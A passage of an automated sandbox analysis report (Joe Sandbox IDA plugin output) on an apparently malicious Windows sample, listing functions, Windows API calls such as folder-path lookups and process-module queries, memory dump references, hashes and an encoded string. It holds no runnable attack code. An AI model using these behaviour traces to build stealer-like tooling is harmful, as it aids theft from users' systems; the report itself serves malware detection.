                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xu$xt
                                • API String ID: 3105635775-2689811054
                                • Opcode ID: d16a4b5ea668a202f54f07fa77280b58224e22ed25113c5694fbe82c3f246f0e
                                • Instruction ID: 4116135c86ff742798884d98594b6e46ad163b2a15f283ad5d78249afa918327
                                • Opcode Fuzzy Hash: d16a4b5ea668a202f54f07fa77280b58224e22ed25113c5694fbe82c3f246f0e
                                • Instruction Fuzzy Hash: 5B0188714857009ED724DF79E80974ABBE0AF50364F20AA1EE0D9772E1CBB0A944CB15
                                Function 00E5E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E573
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E581
                                • lstrcat.KERNEL32(?,016CDDF0), ref: 00E5E59C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 7ab389c02642f379e1ac77de4f9e0c7e627e8a7fe9d87debcb82034de6d99f8b
                                • Instruction ID: 52c11d123bebc3201f47c3f8703e1c9ecf28118d4c3bd7427bed944e2756fcea
                                • Opcode Fuzzy Hash: 7ab389c02642f379e1ac77de4f9e0c7e627e8a7fe9d87debcb82034de6d99f8b
                                • Instruction Fuzzy Hash: 8351E6B5A10108AFCB15EB54EC46EFE33F8EB48300F405499FA45B7345EA34AF848BA0
                                Function 00E61FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00E61FDF, 00E61FF5, 00E620B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 9b074a36fc76f23dc842fe845d194b6d457b1a03a8bfb64f962cbf454dee361e
                                • Instruction ID: 406fed25792ccf9909583c9a573ffaddab0254924d74aa8f27870aca409c8d45
                                • Opcode Fuzzy Hash: 9b074a36fc76f23dc842fe845d194b6d457b1a03a8bfb64f962cbf454dee361e
                                • Instruction Fuzzy Hash: CF217E395506898FCB20EB35E4447DDF767DF803E5F84A05AC9183B282E336090AD796
                                Function 00E5EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5EBF1
                                • lstrcat.KERNEL32(?,016CECA8), ref: 00E5EC0C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 092f24c5ebea7058d97ee52d4e537c9f758d872c2ad6c88df5b3c8caa0c8ff02
                                • Instruction ID: 07beb5093f5684e8cedb455b3cadea89d52af863928db0f26c30d6316765140c
                                • Opcode Fuzzy Hash: 092f24c5ebea7058d97ee52d4e537c9f758d872c2ad6c88df5b3c8caa0c8ff02
                                • Instruction Fuzzy Hash: 7C31A471A10118ABCB65EF64EC46BED73F4AF48301F5054A8BB46B7341DA34AF448BA0
                                Function 00E64480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 00E64492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E644AD
                                • CloseHandle.KERNEL32(00000000), ref: 00E644B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E644E7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 8eec054afd31bfab86700d0701e374fc14e5d7b3dc89a0608f1d88138d5c0bce
                                • Instruction ID: d4f101d9177203ee987d09cbfb1ef6da5682524ea88a0eb1817c74784f31d757
                                • Opcode Fuzzy Hash: 8eec054afd31bfab86700d0701e374fc14e5d7b3dc89a0608f1d88138d5c0bce
                                • Instruction Fuzzy Hash: C4F0C8F0D416152FE731AB74AC49BE676A8AF15318F0045A5FB95F61C0DAB498808790
                                Function 00E68FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00E68FDD
                                  • Part of subcall function 00E687FF: __amsg_exit.LIBCMT ref: 00E6880F
                                • __getptd.LIBCMT ref: 00E68FF4
                                • __amsg_exit.LIBCMT ref: 00E69002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00E69026
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 3bf484dd372fe3dbca463c9961207538f8f6888dfa3519e5c2426c48103d6c11
                                • Instruction ID: fb7766d529433ae842bb14d1c1a9f8bd8f2c6f675d8549c1e7e985fe4fa99de3
                                • Opcode Fuzzy Hash: 3bf484dd372fe3dbca463c9961207538f8f6888dfa3519e5c2426c48103d6c11
                                • Instruction Fuzzy Hash: B7F06D329C87209ADAA4BB78B80A75922E16F007A9F246219F484BB1D3DF745D40DA55
                                Function 00E67310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,00E45BEB), ref: 00E6731B
                                • lstrcpy.KERNEL32(00000000), ref: 00E6733F
                                • lstrcat.KERNEL32(?,------), ref: 00E67349
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 06563fc13ab1fab897475014258a2d5bf70341ba38d23c4a7370a33336572065
                                • Instruction ID: 9b4db4acad7297d6548b678bda9129aa3573bc73f17b02b81de5e4eae04e213c
                                • Opcode Fuzzy Hash: 06563fc13ab1fab897475014258a2d5bf70341ba38d23c4a7370a33336572065
                                • Instruction Fuzzy Hash: 65F0C9749517029FDB249F35E848926BAF9EF85719318982DA8DAD7308E734E880CF50
                                Function 00E533D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53422
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53471
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53497
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 560a07566f14d67a5e6f7090b7733fb6f8f0a32701400585c50d423044039cef
                                • Instruction ID: 3b2fd74e67831711889cc327e7659c9e1ae7c017bec6e47a3151818b349ef6bd
                                • Opcode Fuzzy Hash: 560a07566f14d67a5e6f7090b7733fb6f8f0a32701400585c50d423044039cef
                                • Instruction Fuzzy Hash: 30123D70A012018FDB28CF29D554B25B7E1BF4436EB19D4AEE809EB3A6D772DD46CB40
                                Function 00E57C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57CAF
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D58
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D76
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 13f685c43f9537fc9f9f1523f0ff38bb24df47fc894ba8e11e1b7e2e0e5a6afb
                                • Instruction ID: 7293bfead2cd3b21d96a1dbe1947f65d54a3a0eaf31133e4d38b1439e87635d5
                                • Opcode Fuzzy Hash: 13f685c43f9537fc9f9f1523f0ff38bb24df47fc894ba8e11e1b7e2e0e5a6afb
                                • Instruction Fuzzy Hash: 033139723082004BD730DD6CF88096AF7E9EF95756B205E2AF9C1AB641C7719C9583A4
                                Function 00E46EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00E46F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E46F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: cca80e263a845fe4e39ca3d1f0060b1dbda44c316ecd8db7d6c85fedcee0bda6
                                • Instruction ID: cae2e610e9ac0e318de8711cb07d37acedb3904e31fd0f4f44e9378ab4a57742
                                • Opcode Fuzzy Hash: cca80e263a845fe4e39ca3d1f0060b1dbda44c316ecd8db7d6c85fedcee0bda6
                                • Instruction Fuzzy Hash: 85218EB06006019BEB208F24EC85BBA73E8FB41708F445968F986DB685E7B9E949C751
                                Function 00E62400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6244C
                                • lstrlen.KERNEL32(00000000), ref: 00E624E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E62570
                                • lstrlen.KERNEL32(00000000), ref: 00E62577
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
